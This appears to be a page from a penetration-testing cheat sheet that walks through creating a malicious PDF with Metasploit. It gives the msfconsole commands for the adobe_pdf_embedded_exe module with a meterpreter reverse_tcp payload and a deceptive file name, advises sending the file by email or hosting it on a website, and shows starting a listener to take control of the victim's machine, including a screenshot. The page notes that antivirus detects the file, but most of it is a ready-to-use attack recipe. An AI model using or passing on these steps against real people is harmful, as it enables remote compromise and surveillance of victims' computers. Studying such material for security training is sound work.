Malicious PDF

Attackers can compromise target machine by sending malicious PDF.

Exploitation using Metasploit

The PDF created by this process can be easily detected by modern Windows built-in antivirus. So this exploitation may be not useful for attackers.

1. Create a PDF

Attackers can create a malicious PDF using metasploit.

msfconsole

msf> use exploit/windows/fileformat/adobe_pdf_embedded_exe
# Set payload for windows if target machine is windows
msf> set payload windows/x64/meterpreter/reverse_tcp
# Set the attacker's ip address
msf> set lhost 10.0.0.1
# Change filename
msf> set filename supersafe.pdf
# Optionally, the custom PDF can be used
msf> set infilename /path/to/custom.pdf
msf> exploit

2. Send PDF to Target Machine

After creating a PDF, attackers need to send it to target user. There are various ways to do that. For example,

Host the PDF in attacker’s website.
Send an email with this PDF attached.

3. Start Listener in Attacker’s Machine

To receive incoming connection from target machine, attackers start a listener in their machine.

msf> use exploit/multi/handler
# Match the payload when PDF was created
msf> set payload windows/x64/meterpreter/reverse_tcp
# Set the attacker's ip address
msf> set lhost 10.0.0.1
msf> exploit

4. Reverse Shell

When a victim open the PDF using Adobe Reader, this file starts a reverse shell to connect the attacker’s machine. After that, attackers can control the victim’s machine in their terminal.

# In metasploit session

meterpreter> pwd
# Take a screenshot of the victim's screen
meterpreter> screenshot

References

PreviousWindow Exploit NextWindows Print Spooler Service

Last updated 1 month ago

hashtagExploitation using Metasploit

hashtag1. Create a PDF

hashtag2. Send PDF to Target Machine

hashtag3. Start Listener in Attacker’s Machine

hashtag4. Reverse Shell

hashtagReferences